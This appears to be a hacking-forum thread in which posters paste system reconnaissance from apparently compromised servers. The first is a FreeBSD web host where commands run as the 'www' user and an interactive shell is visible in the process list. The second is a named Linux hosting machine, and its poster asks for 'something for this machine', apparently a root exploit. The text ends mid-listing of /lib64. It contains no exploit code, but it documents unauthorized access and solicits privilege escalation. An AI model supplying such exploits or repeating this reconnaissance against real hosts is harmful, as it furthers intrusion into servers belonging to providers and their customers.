Code: $ uname -a FreeBSD сайт 7.4-RELEASE-p7 FreeBSD 7.4-RELEASE-p7 #3: Fri May 4 12:59:48 YEKT 2012 alex@ сайт:/usr/obj/usr/src/sys/сайт i386 $ ls -la /boot total 3328 drwxr-xr-x 12 root wheel 1024 Aug 4 2013 . drwxr-xr-x 22 root wheel 512 May 14 2012 .. drwxr-xr-x 2 root wheel 28672 Feb 17 2011 GENERIC -r--r--r-- 1 root wheel 7689 May 14 2012 beastie.4th -r--r--r-- 1 root wheel 8192 May 14 2012 boot -r--r--r-- 1 root wheel 512 May 14 2012 boot0 -r--r--r-- 1 root wheel 512 May 14 2012 boot0sio -r--r--r-- 1 root wheel 512 May 14 2012 boot1 -r--r--r-- 1 root wheel 7680 May 14 2012 boot2 -r--r--r-- 1 root wheel 1201 May 14 2012 cdboot drwxr-xr-x 2 root wheel 512 May 14 2012 defaults -r--r--r-- 1 root wheel 1746 Feb 17 2011 device.hints drwxr-xr-x 2 root wheel 512 Feb 17 2011 firmware -r--r--r-- 1 root wheel 2258 May 14 2012 frames.4th -r--r--r-- 1 root wheel 7567 May 14 2012 gptboot -r--r--r-- 1 root wheel 26259 May 14 2012 gptzfsboot drwxr-xr-x 2 root wheel 12288 Aug 5 2013 kernel drwxr-xr-x 2 root wheel 28672 Mar 30 2011 kernel.GENERIC drwxr-xr-x 2 root wheel 512 Aug 3 2013 kernel.сайт drwxr-xr-x 2 root wheel 12288 Aug 5 2013 kernel.modules drwxr-xr-x 2 root wheel 512 May 14 2012 kernel.old -r-xr-xr-x 1 root wheel 253952 May 14 2012 loader -r--r--r-- 1 root wheel 5865 May 14 2012 loader.4th -rw-r--r-- 1 root wheel 18 Mar 30 2011 loader.conf -rw-r--r-- 1 root wheel 17 Mar 30 2011 loader.conf.old -r--r--r-- 1 root wheel 15219 May 14 2012 loader.help -r-xr-xr-x 1 root wheel 253952 Dec 30 2011 loader.old -r--r--r-- 1 root wheel 392 Feb 17 2011 loader.rc -r--r--r-- 1 root wheel 512 May 14 2012 mbr drwxr-xr-x 2 root wheel 512 Feb 17 2011 modules -r--r--r-- 1 root wheel 512 May 14 2012 pmbr -r--r--r-- 1 root wheel 256000 May 14 2012 pxeboot -r--r--r-- 1 root wheel 699 May 14 2012 screen.4th -r--r--r-- 1 root wheel 35136 May 14 2012 support.4th drwxr-xr-x 2 root wheel 512 Feb 17 2011 zfs -r--r--r-- 1 root wheel 33280 May 14 2012 zfsboot -r-xr-xr-x 1 root wheel 274432 May 14 2012 zfsloader -r-xr-xr-x 1 root wheel 274432 Dec 30 2011 zfsloader.old $ mount /dev/mfid0a on / (ufs, local, noatime, soft-updates) devfs on /dev (devfs, local) /dev/mfid0e on /usr/local (ufs, local, noatime, soft-updates) /dev/mfid0d on /usr (ufs, local, noatime, soft-updates) /dev/mfid0f on /var (ufs, local, noatime, soft-updates) /dev/mfid0g on /mail (ufs, local, noatime, soft-updates) /dev/mfid0h on /local (ufs, local, noatime, soft-updates) /dev/mfid1s1d on /opt (ufs, local, noatime) /dev/mfid1s1e on /backup (ufs, local, noatime) /dev/md0 on /local/www/сайт/cache (ufs, asynchronous, local, noexec, nosuid) $ df -h Filesystem Size Used Avail Capacity Mounted on /dev/mfid0a 1.9G 419M 1.4G 23% / devfs 1.0K 1.0K 0B 100% /dev /dev/mfid0e 4.8G 4.0K 4.5G 0% /usr/local /dev/mfid0d 4.8G 4.4G 85M 98% /usr /dev/mfid0f 48G 40G 4.8G 89% /var /dev/mfid0g 194G 127G 51G 71% /mail /dev/mfid0h 315G 225G 65G 78% /local /dev/mfid1s1d 291G 28G 240G 10% /opt /dev/mfid1s1e 286G 246G 17G 94% /backup /dev/md0 31M 274K 28M 1% /local/www/сайт/cache $ cat /etc/crontab # /etc/crontab - root's crontab for FreeBSD # # $FreeBSD: src/etc/crontab,v 1.32.24.1.4.1 2010/12/21 17:10:29 kensmith Exp $ # SHELL=/bin/sh PATH=/etc:/bin:/sbin:/usr/bin:/usr/sbin # #minute hour mday month wday who command # */5 * * * * root /usr/libexec/atrun # # Save some entropy so that /dev/random can re-seed on boot. */11 * * * * operator /usr/libexec/save-entropy # # Rotate log files every hour, if necessary. 0 * * * * root newsyslog # # Perform daily/weekly/monthly maintenance. 1 3 * * * root periodic daily 15 4 * * 6 root periodic weekly 30 5 1 * * root periodic monthly # # Adjust the time zone if the CMOS clock keeps local time, as opposed to # UTC time. See adjkerntz(8) for details. 1,31 0-5 * * * root adjkerntz –a $ ls -la /libexec total 736 drwxr-xr-x 2 root wheel 512 May 14 2012 . drwxr-xr-x 22 root wheel 512 May 14 2012 .. -r-xr-xr-x 1 root wheel 180896 Dec 30 2011 ld-elf.so.1 -r-xr-xr-x 1 root wheel 189184 Feb 17 2011 ld-elf.so.1.old $ ps axfu USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND www 95411 42.9 1.2 54276 41460 ?? S 1:32PM 6:07.03 /usr/local/sbin/ht www 5177 25.5 2.2 100356 74032 ?? R 2:32PM 0:18.89 /usr/local/sbin/ht www 90963 8.9 1.2 54532 41976 ?? S 1:03PM 8:25.48 /usr/local/sbin/ht www 95403 8.4 1.2 54276 41800 ?? R 1:32PM 5:43.07 /usr/local/sbin/ht www 88613 8.3 1.2 54532 41816 ?? S 12:49PM 10:15.64 /usr/local/sbin/ht www 5696 7.9 0.1 3756 2668 ?? S 2:35PM 0:00.02 sendmail: ./t5H9Zj www 5695 7.8 0.0 3460 1144 ?? S 2:35PM 0:00.00 sh -c /usr/sbin/se www 94821 7.8 1.2 55300 41244 ?? S 1:28PM 6:21.93 /usr/local/sbin/ht www 96019 7.6 1.2 54276 41068 ?? S 1:36PM 5:11.63 /usr/local/sbin/ht www 95914 7.5 1.2 54276 41184 ?? S 1:35PM 5:31.22 /usr/local/sbin/ht www 5458 7.1 0.8 40964 26572 ?? S 2:34PM 0:07.37 /usr/local/sbin/ht www 95698 6.6 1.2 53252 40632 ?? S 1:34PM 5:23.52 /usr/local/sbin/ht www 5689 3.8 0.7 39940 22140 ?? S 2:35PM 0:00.56 /usr/local/sbin/ht www 914 3.6 0.2 8192 6688 ?? R 22May15 1399:37.78 nginx: worker proc www 913 2.9 0.2 9216 7344 ?? S 22May15 1401:01.32 nginx: worker proc www 95287 2.8 1.3 55300 42616 ?? R 1:31PM 6:12.23 /usr/local/sbin/ht www 5692 1.6 0.6 39940 20212 ?? S 2:35PM 0:00.23 /usr/local/sbin/ht www 932 0.0 0.3 36776 10456 ?? I 22May15 0:00.21 /usr/local/sbin/ht www 5702 0.0 0.0 3460 1144 ?? S 2:35PM 0:00.00 sh -c ps axfu www 5703 0.0 0.0 3244 944 ?? R 2:35PM 0:00.00 ps axfu www 20314 0.0 0.0 0 0 ?? Z Mon09AM 0:00.00 <defunct> www 42814 0.0 0.0 0 0 ?? Z Sun11PM 0:00.00 <defunct> www 50717 0.0 0.0 3460 1100 ?? I 8Jun15 0:00.01 /bin/sh -i www 52999 0.0 0.0 3128 700 ?? I 8Jun15 0:02.89 tail -f pureftpd.l www 58328 0.0 0.0 0 0 ?? Z Sun12PM 0:00.05 <defunct> www 89316 0.0 0.0 0 0 ?? Z 3:28PM 0:00.00 <defunct> ls -la /tmp total 1280 drwxrwxrwt 10 root wheel 3072 Jun 17 14:39 . drwxr-xr-x 22 root wheel 512 May 14 2012 .. drwxrwxrwt 2 root wheel 512 May 22 17:34 .ICE-unix drwxrwxrwt 2 root wheel 512 May 22 17:34 .X11-unix drwxrwxrwt 2 root wheel 512 May 22 17:34 .XIM-unix drwxrwxrwt 2 root wheel 512 May 22 17:34 .font-unix -rw------- 1 spamassasin wheel 7221 Nov 25 2013 .spamassassin12210SilOHtmp drwx------ 3 www www 512 Dec 19 2011 fast prw------- 1 root wheel 0 Mar 30 2011 make_fifo_VRxkXE6sJ drwx------ 2 alex wheel 512 Nov 15 2012 mc-alex drwx------ 2 root wheel 512 Jun 2 11:22 mc-root -rw-r--r-- 1 www wheel 0 Jun 8 15:53 overwrites -rw------- 1 root wheel 36 Jun 23 2011 periodic.slLwSSsz08 -rw------- 1 root wheel 48 Jun 23 2011 periodic.vODgX3C8Hg drwxr-xr-x 3 root wheel 512 Apr 9 2011 screens -rw------- 1 root wheel 0 Jun 23 2011 security.MxksURwR $ id uid=80(www) gid=80(www) groups=80(www)
подскажите что нить для этой машинки uname -a Code: Linux mh40.mobyhost.ru 2.6.18-400.1.1.el5 #1 SMP Thu Dec 18 00:59:53 EST 2014 x86_64 x86_64 x86_64 GNU/Linux ls -la --full-time /lib Code: total 17352 drwxr-xr-x 11 root root 4096 2015-06-16 01:09:12.000000000 +0300 . drwxr-xr-x 28 root root 4096 2015-06-30 23:01:02.000000000 +0300 .. -rw-r--r-- 1 root root 65 2015-05-13 13:33:41.000000000 +0300 .libcrypto.so.0.9.8e.hmac lrwxrwxrwx 1 root root 25 2015-05-14 01:08:56.000000000 +0300 .libcrypto.so.6.hmac -> .libcrypto.so.0.9.8e.hmac -rw-r--r-- 1 root root 65 2015-05-13 13:33:41.000000000 +0300 .libssl.so.0.9.8e.hmac lrwxrwxrwx 1 root root 22 2015-05-14 01:08:56.000000000 +0300 .libssl.so.6.hmac -> .libssl.so.0.9.8e.hmac drwxr-xr-x 2 root root 4096 2014-10-01 01:12:30.000000000 +0400 bdevid lrwxrwxrwx 1 root root 14 2014-10-01 01:11:14.000000000 +0400 cpp -> ../usr/bin/cpp drwxr-xr-x 2 root root 4096 2014-10-01 01:11:27.000000000 +0400 firmware drwxr-xr-x 3 root root 4096 2015-01-27 21:28:03.000000000 +0300 i686 drwxr-xr-x 6 root root 4096 2013-01-09 07:14:22.000000000 +0400 kbd -rwxr-xr-x 1 root root 130860 2015-01-27 22:04:53.000000000 +0300 ld-2.5.so lrwxrwxrwx 1 root root 9 2015-01-28 18:11:41.000000000 +0300 ld-linux.so.2 -> ld-2.5.so lrwxrwxrwx 1 root root 13 2015-01-28 18:11:50.000000000 +0300 ld-lsb.so.3 -> ld-linux.so.2 -rwxr-xr-x 1 root root 7664 2015-01-27 22:04:53.000000000 +0300 libBrokenLocale-2.5.so lrwxrwxrwx 1 root root 22 2015-01-28 18:11:41.000000000 +0300 libBrokenLocale.so.1 -> libBrokenLocale-2.5.so -rwxr-xr-x 1 root root 16704 2015-01-27 22:04:53.000000000 +0300 libSegFault.so -rwxr-xr-x 1 root root 14128 2015-01-27 22:04:53.000000000 +0300 libanl-2.5.so lrwxrwxrwx 1 root root 13 2015-01-28 18:11:41.000000000 +0300 libanl.so.1 -> libanl-2.5.so lrwxrwxrwx 1 root root 18 2010-02-26 16:19:28.000000000 +0300 libasound.so.2 -> libasound.so.2.0.0 -rwxr-xr-x 1 root root 907328 2009-01-21 06:47:23.000000000 +0300 libasound.so.2.0.0 lrwxrwxrwx 1 root root 17 2012-03-13 01:13:26.000000000 +0400 libaudit.so.0 -> libaudit.so.0.0.0 -rwxr-xr-x 1 root root 95740 2012-02-22 19:10:06.000000000 +0400 libaudit.so.0.0.0 lrwxrwxrwx 1 root root 19 2012-03-13 01:13:26.000000000 +0400 libauparse.so.0 -> libauparse.so.0.0.0 -rwxr-xr-x 1 root root 58932 2012-02-22 19:10:06.000000000 +0400 libauparse.so.0.0.0 lrwxrwxrwx 1 root root 15 2014-10-01 01:12:22.000000000 +0400 libblkid.so.1 -> libblkid.so.1.0 -rwxr-xr-x 1 root root 36740 2014-09-18 14:12:28.000000000 +0400 libblkid.so.1.0 -rwxr-xr-x 1 root root 1706208 2015-01-27 22:04:54.000000000 +0300 libc-2.5.so lrwxrwxrwx 1 root root 11 2015-01-28 18:11:42.000000000 +0300 libc.so.6 -> libc-2.5.so lrwxrwxrwx 1 root root 14 2009-09-29 10:32:08.000000000 +0400 libcap.so.1 -> libcap.so.1.10 -rwxr-xr-x 1 root root 11560 2007-03-14 21:15:10.000000000 +0300 libcap.so.1.10 -rwxr-xr-x 1 root root 191708 2015-01-27 22:04:55.000000000 +0300 libcidn-2.5.so lrwxrwxrwx 1 root root 14 2015-01-28 18:11:42.000000000 +0300 libcidn.so.1 -> libcidn-2.5.so lrwxrwxrwx 1 root root 17 2014-10-01 01:12:22.000000000 +0400 libcom_err.so.2 -> libcom_err.so.2.1 -rwxr-xr-x 1 root root 6364 2014-09-18 14:12:28.000000000 +0400 libcom_err.so.2.1 -rwxr-xr-x 1 root root 45432 2015-01-27 22:04:55.000000000 +0300 libcrypt-2.5.so lrwxrwxrwx 1 root root 15 2015-01-28 18:11:42.000000000 +0300 libcrypt.so.1 -> libcrypt-2.5.so -rwxr-xr-x 1 root root 1299328 2015-05-13 13:33:41.000000000 +0300 libcrypto.so.0.9.8e lrwxrwxrwx 1 root root 14 2009-09-29 10:32:08.000000000 +0400 libcrypto.so.4 -> libcrypto.so.6 lrwxrwxrwx 1 root root 19 2015-05-14 01:08:56.000000000 +0300 libcrypto.so.6 -> libcrypto.so.0.9.8e -rwxr-xr-x 1 root root 838860 2007-01-07 08:37:48.000000000 +0300 libdb-4.1.so -rwxr-xr-x 1 root root 934132 2007-01-07 08:37:48.000000000 +0300 libdb-4.2.so -rwxr-xr-x 1 root root 1010204 2010-07-12 20:11:02.000000000 +0400 libdb-4.3.so -rwxr-xr-x 1 root root 905704 2007-01-07 08:37:48.000000000 +0300 libdb_cxx-4.1.so -rwxr-xr-x 1 root root 1019472 2007-01-07 08:37:48.000000000 +0300 libdb_cxx-4.2.so lrwxrwxrwx 1 root root 18 2013-10-20 01:11:03.000000000 +0400 libdbus-1.so.3 -> libdbus-1.so.3.4.0 -rwxr-xr-x 1 root root 257492 2013-10-02 01:59:51.000000000 +0400 libdbus-1.so.3.4.0 -r--r--r-- 1 root root 45098 2014-11-18 13:11:21.000000000 +0300 libdevmapper-event.a lrwxrwxrwx 1 root root 26 2014-11-19 01:08:51.000000000 +0300 libdevmapper-event.so -> libdevmapper-event.so.1.02 -r-xr-xr-x 1 root root 18488 2014-11-18 13:11:29.000000000 +0300 libdevmapper-event.so.1.02 -r--r--r-- 1 root root 496324 2014-11-18 13:11:15.000000000 +0300 libdevmapper.a lrwxrwxrwx 1 root root 20 2014-11-19 01:08:51.000000000 +0300 libdevmapper.so -> libdevmapper.so.1.02 -r-xr-xr-x 1 root root 163292 2014-11-18 13:11:29.000000000 +0300 libdevmapper.so.1.02 -rwxr-xr-x 1 root root 20668 2015-01-27 22:04:55.000000000 +0300 libdl-2.5.so lrwxrwxrwx 1 root root 12 2015-01-28 18:11:42.000000000 +0300 libdl.so.2 -> libdl-2.5.so lrwxrwxrwx 1 root root 13 2014-10-01 01:12:22.000000000 +0400 libe2p.so.2 -> libe2p.so.2.3 -rwxr-xr-x 1 root root 20192 2014-09-18 14:12:28.000000000 +0400 libe2p.so.2.3 lrwxrwxrwx 1 root root 17 2012-06-14 01:12:14.000000000 +0400 libexpat.so.0 -> libexpat.so.0.5.0 -rwxr-xr-x 1 root root 135932 2012-06-13 18:35:31.000000000 +0400 libexpat.so.0.5.0 lrwxrwxrwx 1 root root 16 2014-10-01 01:12:22.000000000 +0400 libext2fs.so.2 -> libext2fs.so.2.4 -rwxr-xr-x 1 root root 113892 2014-09-18 14:12:28.000000000 +0400 libext2fs.so.2.4 -rwxr-xr-x 1 root root 45192 2014-09-18 07:05:57.000000000 +0400 libgcc_s-4.1.2-20080825.so.1 lrwxrwxrwx 1 root root 28 2014-10-01 01:12:23.000000000 +0400 libgcc_s.so.1 -> libgcc_s-4.1.2-20080825.so.1 lrwxrwxrwx 1 root root 23 2009-09-29 10:32:11.000000000 +0400 libglib-2.0.so.0 -> libglib-2.0.so.0.1200.3 -rwxr-xr-x 1 root root 644472 2009-03-25 04:52:17.000000000 +0300 libglib-2.0.so.0.1200.3 lrwxrwxrwx 1 root root 26 2009-09-29 10:32:08.000000000 +0400 libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.1200.3 -rwxr-xr-x 1 root root 11396 2009-03-25 04:52:17.000000000 +0300 libgmodule-2.0.so.0.1200.3 lrwxrwxrwx 1 root root 26 2009-09-29 10:32:08.000000000 +0400 libgobject-2.0.so.0 -> libgobject-2.0.so.0.1200.3 -rwxr-xr-x 1 root root 259128 2009-03-25 04:52:17.000000000 +0300 libgobject-2.0.so.0.1200.3 lrwxrwxrwx 1 root root 26 2009-09-29 10:32:11.000000000 +0400 libgthread-2.0.so.0 -> libgthread-2.0.so.0.1200.3 -rwxr-xr-x 1 root root 14660 2009-03-25 04:52:17.000000000 +0300 libgthread-2.0.so.0.1200.3 -rwxr-xr-x 1 root root 27964 2007-03-15 06:26:22.000000000 +0300 libiw.so.28 -rwxr-xr-x 1 root root 6404 2007-01-06 10:57:38.000000000 +0300 libkeyutils-1.2.so lrwxrwxrwx 1 root root 18 2009-09-29 10:32:08.000000000 +0400 libkeyutils.so.1 -> libkeyutils-1.2.so -rwxr-xr-x 1 root root 216544 2015-01-27 22:04:55.000000000 +0300 libm-2.5.so lrwxrwxrwx 1 root root 11 2015-01-28 18:11:42.000000000 +0300 libm.so.6 -> libm-2.5.so -rwxr-xr-x 1 root root 109740 2015-01-27 22:04:55.000000000 +0300 libnsl-2.5.so lrwxrwxrwx 1 root root 13 2015-01-28 18:11:42.000000000 +0300 libnsl.so.1 -> libnsl-2.5.so -rwxr-xr-x 1 root root 36468 2015-01-27 22:04:55.000000000 +0300 libnss_compat-2.5.so lrwxrwxrwx 1 root root 20 2015-01-28 18:11:42.000000000 +0300 libnss_compat.so.2 -> libnss_compat-2.5.so -rwxr-xr-x 1 root root 827876 2015-01-05 13:12:47.000000000 +0300 libnss_db-2.2.so lrwxrwxrwx 1 root root 16 2015-01-06 01:08:48.000000000 +0300 libnss_db.so.2 -> libnss_db-2.2.so -rwxr-xr-x 1 root root 21948 2015-01-27 22:04:56.000000000 +0300 libnss_dns-2.5.so lrwxrwxrwx 1 root root 17 2015-01-28 18:11:42.000000000 +0300 libnss_dns.so.2 -> libnss_dns-2.5.so -rwxr-xr-x 1 root root 50848 2015-01-27 22:04:56.000000000 +0300 libnss_files-2.5.so lrwxrwxrwx 1 root root 19 2015-01-28 18:11:42.000000000 +0300 libnss_files.so.2 -> libnss_files-2.5.so -rwxr-xr-x 1 root root 22764 2015-01-27 22:04:56.000000000 +0300 libnss_hesiod-2.5.so lrwxrwxrwx 1 root root 20 2015-01-28 18:11:42.000000000 +0300 libnss_hesiod.so.2 -> libnss_hesiod-2.5.so -rwxr-xr-x 1 root root 3217504 2015-06-15 15:37:43.000000000 +0300 libnss_ldap-2.5.so lrwxrwxrwx 1 root root 18 2015-06-16 01:09:12.000000000 +0300 libnss_ldap.so.2 -> libnss_ldap-2.5.so -rwxr-xr-x 1 root root 46624 2015-01-27 22:04:56.000000000 +0300 libnss_nis-2.5.so lrwxrwxrwx 1 root root 17 2015-01-28 18:11:42.000000000 +0300 libnss_nis.so.2 -> libnss_nis-2.5.so -rwxr-xr-x 1 root root 55804 2015-01-27 22:04:56.000000000 +0300 libnss_nisplus-2.5.so lrwxrwxrwx 1 root root 21 2015-01-28 18:11:42.000000000 +0300 libnss_nisplus.so.2 -> libnss_nisplus-2.5.so lrwxrwxrwx 1 root root 16 2015-05-28 01:09:09.000000000 +0300 libpam.so.0 -> libpam.so.0.81.5 -rwxr-xr-x 1 root root 43020 2015-05-27 16:48:30.000000000 +0300 libpam.so.0.81.5 lrwxrwxrwx 1 root root 21 2015-05-28 01:09:09.000000000 +0300 libpam_misc.so.0 -> libpam_misc.so.0.81.2 -rwxr-xr-x 1 root root 8624 2015-05-27 16:48:30.000000000 +0300 libpam_misc.so.0.81.2 lrwxrwxrwx 1 root root 17 2015-05-28 01:09:09.000000000 +0300 libpamc.so.0 -> libpamc.so.0.81.0 -rwxr-xr-x 1 root root 9868 2015-05-27 16:48:30.000000000 +0300 libpamc.so.0.81.0 lrwxrwxrwx 1 root root 16 2013-10-20 01:10:29.000000000 +0400 libpcre.so.0 -> libpcre.so.0.0.1 -rwxr-xr-x 1 root root 127760 2013-10-01 22:18:22.000000000 +0400 libpcre.so.0.0.1 -rwxr-xr-x 1 root root 137944 2015-01-27 22:04:56.000000000 +0300 libpthread-2.5.so lrwxrwxrwx 1 root root 17 2015-01-28 18:11:42.000000000 +0300 libpthread.so.0 -> libpthread-2.5.so -rwxr-xr-x 1 root root 84904 2015-01-27 22:04:56.000000000 +0300 libresolv-2.5.so lrwxrwxrwx 1 root root 16 2015-01-28 18:11:42.000000000 +0300 libresolv.so.2 -> libresolv-2.5.so -rwxr-xr-x 1 root root 48156 2015-01-27 22:04:56.000000000 +0300 librt-2.5.so lrwxrwxrwx 1 root root 12 2015-01-28 18:11:42.000000000 +0300 librt.so.1 -> librt-2.5.so -rwxr-xr-x 1 root root 91892 2011-03-06 07:51:56.000000000 +0300 libselinux.so.1 -rwxr-xr-x 1 root root 243928 2010-03-31 12:26:18.000000000 +0400 libsepol.so.1 lrwxrwxrwx 1 root root 12 2014-10-01 01:12:22.000000000 +0400 libss.so.2 -> libss.so.2.0 -rwxr-xr-x 1 root root 19008 2014-09-18 14:12:28.000000000 +0400 libss.so.2.0 -rwxr-xr-x 1 root root 300636 2015-05-13 13:33:41.000000000 +0300 libssl.so.0.9.8e lrwxrwxrwx 1 root root 11 2009-09-29 10:32:08.000000000 +0400 libssl.so.4 -> libssl.so.6 lrwxrwxrwx 1 root root 16 2015-05-14 01:08:56.000000000 +0300 libssl.so.6 -> libssl.so.0.9.8e lrwxrwxrwx 1 root root 19 2009-09-29 10:32:12.000000000 +0400 libtermcap.so.2 -> libtermcap.so.2.0.8 -rwxr-xr-x 1 root root 11636 2007-01-06 16:01:17.000000000 +0300 libtermcap.so.2.0.8 -rwxr-xr-x 1 root root 33852 2015-01-27 22:04:56.000000000 +0300 libthread_db-1.0.so lrwxrwxrwx 1 root root 19 2015-01-28 18:11:42.000000000 +0300 libthread_db.so.1 -> libthread_db-1.0.so -rwxr-xr-x 1 root root 13492 2015-01-27 22:04:56.000000000 +0300 libutil-2.5.so lrwxrwxrwx 1 root root 14 2015-01-28 18:11:42.000000000 +0300 libutil.so.1 -> libutil-2.5.so lrwxrwxrwx 1 root root 14 2014-10-01 01:12:22.000000000 +0400 libuuid.so.1 -> libuuid.so.1.2 -rwxr-xr-x 1 root root 14472 2014-09-18 14:12:28.000000000 +0400 libuuid.so.1.2 lrwxrwxrwx 1 root root 22 2014-10-01 01:12:29.000000000 +0400 libvolume_id.so.0 -> libvolume_id.so.0.66.0 -rwxr-xr-x 1 root root 37032 2014-09-17 23:19:08.000000000 +0400 libvolume_id.so.0.66.0 lrwxrwxrwx 1 root root 16 2009-10-23 01:10:46.000000000 +0400 libwrap.so.0 -> libwrap.so.0.7.6 -rwxr-xr-x 1 root root 31344 2009-09-22 02:37:30.000000000 +0400 libwrap.so.0.7.6 lrwxrwxrwx 1 root root 13 2013-01-18 01:13:38.000000000 +0400 libz.so -> libz.so.1.2.3 lrwxrwxrwx 1 root root 13 2013-01-18 01:13:13.000000000 +0400 libz.so.1 -> libz.so.1.2.3 -rwxr-xr-x 1 root root 75088 2012-07-17 12:32:17.000000000 +0400 libz.so.1.2.3 drwxr-xr-x 2 root root 4096 2011-04-10 01:15:39.000000000 +0400 lsb drwxr-xr-x 12 root root 4096 2014-12-25 01:09:56.000000000 +0300 modules drwxr-xr-x 3 root root 4096 2015-01-28 18:11:42.000000000 +0300 rtkaio drwxr-xr-x 4 root root 4096 2015-06-16 01:09:12.000000000 +0300 security drwxr-xr-x 3 root root 4096 2015-07-01 04:23:58.000000000 +0300 udev ls -la --full-time /lib64 Code: total 25552 drwxr-xr-x 8 root root 4096 2015-07-01 04:24:40.000000000 +0300 . drwxr-xr-x 28 root root 4096 2015-06-30 23:01:02.000000000 +0300 .. -rw-r--r-- 1 root root 65 2015-05-12 23:58:28.000000000 +0300 .libcrypto.so.0.9.8e.hmac lrwxrwxrwx 1 root root 25 2015-05-14 01:08:43.000000000 +0300 .libcrypto.so.6.hmac -> .libcrypto.so.0.9.8e.hmac -rw-r--r-- 1 root root 65 2015-05-12 23:58:28.000000000 +0300 .libssl.so.0.9.8e.hmac lrwxrwxrwx 1 root root 22 2015-05-14 01:08:43.000000000 +0300 .libssl.so.6.hmac -> .libssl.so.0.9.8e.hmac drwxr-xr-x 2 root root 4096 2014-10-01 01:11:16.000000000 +0400 bdevid drwxr-xr-x 2 root root 4096 2015-01-29 04:17:01.000000000 +0300 dbus-1 drwxr-xr-x 2 root root 4096 2014-10-01 01:10:52.000000000 +0400 device-mapper drwxr-xr-x 2 root root 4096 2012-10-31 01:09:48.000000000 +0400 iptables -rwxr-xr-x 1 root root 144776 2015-01-27 20:33:48.000000000 +0300 ld-2.5.so lrwxrwxrwx 1 root root 9 2015-01-28 18:11:22.000000000 +0300 ld-linux-x86-64.so.2 -> ld-2.5.so lrwxrwxrwx 1 root root 20 2015-01-28 18:11:50.000000000 +0300 ld-lsb-x86-64.so -> ld-linux-x86-64.so.2 lrwxrwxrwx 1 root root 20 2011-04-10 01:15:38.000000000 +0400 ld-lsb-x86-64.so.3 -> ld-linux-x86-64.so.2 -rwxr-xr-x 1 root root 8904 2015-01-27 20:33:48.000000000 +0300 libBrokenLocale-2.5.so lrwxrwxrwx 1 root root 22 2015-01-28 18:11:22.000000000 +0300 libBrokenLocale.so.1 -> libBrokenLocale-2.5.so -rwxr-xr-x 1 root root 22336 2015-01-27 20:33:48.000000000 +0300 libSegFault.so lrwxrwxrwx 1 root root 15 2012-03-13 01:11:51.000000000 +0400 libacl.so.1 -> libacl.so.1.1.0 -rwxr-xr-x 1 root root 27920 2012-02-22 17:57:53.000000000 +0400 libacl.so.1.1.0 -rwxr-xr-x 1 root root 20064 2015-01-27 20:33:48.000000000 +0300 libanl-2.5.so lrwxrwxrwx 1 root root 13 2015-01-28 18:11:22.000000000 +0300 libanl.so.1 -> libanl-2.5.so lrwxrwxrwx 1 root root 18 2009-10-06 15:17:14.000000000 +0400 libasound.so.2 -> libasound.so.2.0.0 -rwxr-xr-x 1 root root 907552 2009-01-21 06:42:23.000000000 +0300 libasound.so.2.0.0 lrwxrwxrwx 1 root root 16 2009-09-29 10:33:40.000000000 +0400 libattr.so.1 -> libattr.so.1.1.0 -rwxr-xr-x 1 root root 17888 2007-01-06 08:09:58.000000000 +0300 libattr.so.1.1.0 lrwxrwxrwx 1 root root 17 2012-03-13 01:11:49.000000000 +0400 libaudit.so.0 -> libaudit.so.0.0.0 -rwxr-xr-x 1 root root 98920 2012-02-22 19:10:07.000000000 +0400 libaudit.so.0.0.0 lrwxrwxrwx 1 root root 19 2012-03-13 01:11:49.000000000 +0400 libauparse.so.0 -> libauparse.so.0.0.0 -rwxr-xr-x 1 root root 62200 2012-02-22 19:10:07.000000000 +0400 libauparse.so.0.0.0 lrwxrwxrwx 1 root root 15 2014-10-01 01:10:44.000000000 +0400 libblkid.so.1 -> libblkid.so.1.0 -rwxr-xr-x 1 root root 43840 2014-09-18 14:12:06.000000000 +0400 libblkid.so.1.0 -rwxr-xr-x 1 root root 1726296 2015-01-27 20:33:48.000000000 +0300 libc-2.5.so lrwxrwxrwx 1 root root 11 2015-01-28 18:11:22.000000000 +0300 libc.so.6 -> libc-2.5.so lrwxrwxrwx 1 root root 14 2009-09-29 10:33:39.000000000 +0400 libcap.so.1 -> libcap.so.1.10 -rwxr-xr-x 1 root root 17384 2007-03-14 21:13:01.000000000 +0300 libcap.so.1.10 -rwxr-xr-x 1 root root 197744 2015-01-27 20:33:48.000000000 +0300 libcidn-2.5.so lrwxrwxrwx 1 root root 14 2015-01-28 18:11:22.000000000 +0300 libcidn.so.1 -> libcidn-2.5.so lrwxrwxrwx 1 root root 17 2014-10-01 01:10:44.000000000 +0400 libcom_err.so.2 -> libcom_err.so.2.1 -rwxr-xr-x 1 root root 10096 2014-09-18 14:12:06.000000000 +0400 libcom_err.so.2.1 -rwxr-xr-x 1 root root 48600 2015-01-27 20:33:48.000000000 +0300 libcrypt-2.5.so lrwxrwxrwx 1 root root 15 2015-01-28 18:11:22.000000000 +0300 libcrypt.so.1 -> libcrypt-2.5.so -rwxr-xr-x 1 root root 1369312 2015-05-12 23:58:28.000000000 +0300 libcrypto.so.0.9.8e lrwxrwxrwx 1 root root 14 2009-09-29 10:33:39.000000000 +0400 libcrypto.so.4 -> libcrypto.so.6 lrwxrwxrwx 1 root root 19 2015-05-14 01:08:43.000000000 +0300 libcrypto.so.6 -> libcrypto.so.0.9.8e -rwxr-xr-x 1 root root 831880 2007-01-07 06:09:55.000000000 +0300 libdb-4.1.so -rwxr-xr-x 1 root root 927720 2007-01-07 06:09:55.000000000 +0300 libdb-4.2.so -rwxr-xr-x 1 root root 1008656 2010-07-12 20:09:33.000000000 +0400 libdb-4.3.so -rwxr-xr-x 1 root root 901352 2007-01-07 06:09:55.000000000 +0300 libdb_cxx-4.1.so -rwxr-xr-x 1 root root 1011880 2007-01-07 06:09:55.000000000 +0300 libdb_cxx-4.2.so lrwxrwxrwx 1 root root 18 2013-10-20 01:10:44.000000000 +0400 libdbus-1.so.3 -> libdbus-1.so.3.4.0 -rwxr-xr-x 1 root root 243288 2013-10-02 01:59:24.000000000 +0400 libdbus-1.so.3.4.0 lrwxrwxrwx 1 root root 31 2014-10-01 01:10:52.000000000 +0400 libdevmapper-event-lvm2.so -> libdevmapper-event-lvm2.so.2.02 -r-xr-xr-x 1 root root 6712 2014-09-17 21:57:55.000000000 +0400 libdevmapper-event-lvm2.so.2.02 lrwxrwxrwx 1 root root 46 2014-10-01 01:10:52.000000000 +0400 libdevmapper-event-lvm2mirror.so -> device-mapper/libdevmapper-event-lvm2mirror.so lrwxrwxrwx 1 root root 48 2014-10-01 01:10:52.000000000 +0400 